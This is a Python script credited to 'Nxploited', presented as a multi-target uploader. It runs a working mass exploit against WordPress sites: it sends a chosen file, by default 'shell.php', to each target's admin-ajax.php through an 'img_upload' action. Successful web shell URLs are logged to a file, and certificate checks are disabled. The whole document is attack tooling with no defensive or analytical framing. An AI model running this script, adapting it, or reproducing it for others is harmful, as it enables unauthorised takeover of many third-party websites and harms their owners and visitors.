# By: Nxploited import threading import requests import time import os import sys import json import urllib3 from queue import Queue, Empty from rich.console import Console from rich.text import Text from rich.panel import Panel from rich.progress import Progress, SpinnerColumn, TextColumn, TimeElapsedColumn from rich import box from rich.theme import Theme # ===================== GLOBAL CONFIG ===================== urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) os.environ["NO_PROXY"] = "*" THEME = Theme( { "banner": "bold green", "subtitle": "bright_green", "accent": "bold bright_blue", "good": "bold bright_green", "bad": "bold bright_red", "muted": "dim white", "path": "bold bright_yellow", "url": "bold bright_cyan", "status": "bright_blue", } ) console = Console(theme=THEME, force_terminal=True, color_system="truecolor") USER_AGENT = ( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/120.0.0.0 Safari/537.36" ) REQUEST_TIMEOUT = 15 DEFAULT_WORKERS = 6 OUTPUT_FILE = "uploaded_paths.txt" queue_targets: "Queue[str]" = Queue() stats = { "total": 0, "done": 0, "ok": 0, "fail": 0, } stats_lock = threading.Lock() # ===================== UI / BANNER ===================== def print_banner(): art = [ " __ . ..___ _, _, _, ._, , ._, ._, ._, ", "/ `\\ /[__ ___ '_) |.| '_) (_ ___ /| |_ |_ |_ ", "\\__. \\/ [___ /_. |_| /_. (_) .|. ._) ._) ._) ", " ", ] text = Text() for line in art: text.append(line + "\n", style="banner") text.append("\n", style="banner") text.append("AuroraUpload | img_upload multi-target uploader\n", style="subtitle") text.append("By: Nxploited\n", style="accent") text.append("GitHub: https://github.com/Nxploited\n", style="muted") text.append("Telegram: @KNxploited | https://t.me/KNxploited\n", style="muted") console.print( Panel( text, box=box.ROUNDED, border_style="banner", ) ) # ===================== INPUT / SETUP ===================== def prompt_config(): target_file = console.input( "[accent]Targets file (default: list.txt): [/]" ).strip() or "list.txt" threads_raw = console.input( f"[accent]Threads (default: {DEFAULT_WORKERS}): [/]" ).strip() try: threads = int(threads_raw) if threads_raw else DEFAULT_WORKERS except Exception: threads = DEFAULT_WORKERS if threads < 1: threads = 1 payload_name = console.input( "[accent]Local file to upload (e.g. shell.php): [/]" ).strip() or "shell.php" # Resolve payload path (relative to script directory) script_dir = os.path.dirname(os.path.abspath(sys.argv[0])) payload_path = os.path.join(script_dir, payload_name) if not os.path.exists(payload_path): console.print( Panel( Text(f"Local file not found: {payload_path}", style="bad"), border_style="bad", box=box.ROUNDED, ) ) sys.exit(1) return target_file, threads, payload_path def load_targets(filename: str): if not os.path.exists(filename): console.print( Panel( Text(f"Targets file not found: {filename}", style="bad"), border_style="bad", box=box.ROUNDED, ) ) sys.exit(1) targets = [] with open(filename, "r", encoding="utf-8", errors="ignore") as f: for line in f: url = line.strip() if not url: continue if not url.lower().startswith(("http://", "https://")): url = "http://" + url targets.append(url.rstrip("/")) if not targets: console.print( Panel( Text("No targets found in list file.", style="bad"), border_style="bad", box=box.ROUNDED, ) ) sys.exit(1) return targets def write_shell_url(url: str): try: with open(OUTPUT_FILE, "a", encoding="utf-8", errors="ignore") as f: f.write(url.strip() + "\n") except Exception: # Silent fail for logging errors pass # ===================== CORE LOGIC ===================== def build_ajax_url(base: str) -> str: return f"{base.rstrip('/')}/wp-admin/admin-ajax.php" def send_img_upload(base: str, payload_path: str): """ Equivalent to: curl -X POST https://site/wp-admin/admin-ajax.php \ -H "Content-Type: multipart/form-data" \ -F "action=img_upload" \ -F "files=@/path/to/payload" """ url = build_ajax_url(base) try: with open(payload_path, "rb") as fh: files = { "files": (os.path.basename(payload_path), fh, "application/octet-stream"), } data = { "action": "img_upload", } resp = requests.post( url, data=data, files=files, headers={"User-Agent": USER_AGENT}, timeout=REQUEST_TIMEOUT, verify=False, ) except Exception as e: return False, f"REQUEST_ERROR: {e}" body = resp.text.strip() try: j = resp.json() except Exception: return False, f"JSON_PARSE_ERROR: {body[:200]}" if not isinstance(j, dict): return False, "JSON_NOT_OBJECT" status = j.get("status") data_obj = j.get("data") or {} src = None if isinstance(data_obj, dict): src = data_obj.get("src") if status == 1 and src: src = src.replace("\\/", "/") return True, src return False, body[:200] def print_success(site: str, shell_url: str): text = Text() text.append("Upload successful\n\n", style="good") text.append("Target: ", style="accent") text.append(site + "\n", style="url") text.append("Shell URL: ", style="accent") text.append(shell_url + "\n", style="path") console.print( Panel( text, title="[good]IMG_UPLOAD[/good]", border_style="good", box=box.ROUNDED, ) ) def summarize(): with stats_lock: total = stats["total"] done = stats["done"] ok = stats["ok"] fail = stats["fail"] line = Text() line.append("Summary ", style="muted") line.append(f"{done}/{total} ", style="status") line.append("OK:", style="muted") line.append(f"{ok} ", style="good") line.append("FAIL:", style="muted") line.append(str(fail), style="bad") console.print(line) # ===================== WORKER LOOP ===================== def worker_loop(payload_path: str, progress_task=None, progress: Progress | None = None): while True: try: site = queue_targets.get_nowait() except Empty: return base = site.rstrip("/") success = False info = "" try: ok, info = send_img_upload(base, payload_path) if ok: shell_url = info write_shell_url(shell_url) print_success(base, shell_url) success = True else: console.print(f"[bad]FAIL[/bad] {base} -> {info}") except Exception as e: info = str(e) console.print(f"[bad]ERROR[/bad] {base} -> {info}") with stats_lock: stats["done"] += 1 if success: stats["ok"] += 1 else: stats["fail"] += 1 if progress and progress_task is not None: progress.update(progress_task, advance=1) queue_targets.task_done() # ===================== MAIN ===================== def main(): print_banner() targets_file, workers, payload_path = prompt_config() targets = load_targets(targets_file) for t in targets: queue_targets.put(t) with stats_lock: stats["total"] = len(targets) stats["done"] = 0 stats["ok"] = 0 stats["fail"] = 0 console.print( f"[accent]Loaded[/accent] [path]{len(targets)}[/path] [accent]targets | Threads:[/] [path]{workers}[/path]" ) console.print(f"[accent]Payload:[/] [path]{os.path.basename(payload_path)}[/path]\n") threads = [] with Progress( SpinnerColumn(style="status"), TextColumn("[status]{task.description}"), TextColumn("{task.completed}/{task.total}"), TimeElapsedColumn(), console=console, transient=True, ) as progress: progress_task = progress.add_task("Uploading...", total=len(targets)) for _ in range(min(workers, len(targets))): t = threading.Thread( target=worker_loop, args=(payload_path, progress_task, progress), daemon=True, ) t.start() threads.append(t) for t in threads: t.join() console.print() summarize() console.print( Panel( Text(f"Shell URLs saved to {OUTPUT_FILE}", style="good"), border_style="good", box=box.ROUNDED, ) ) if __name__ == "__main__": main()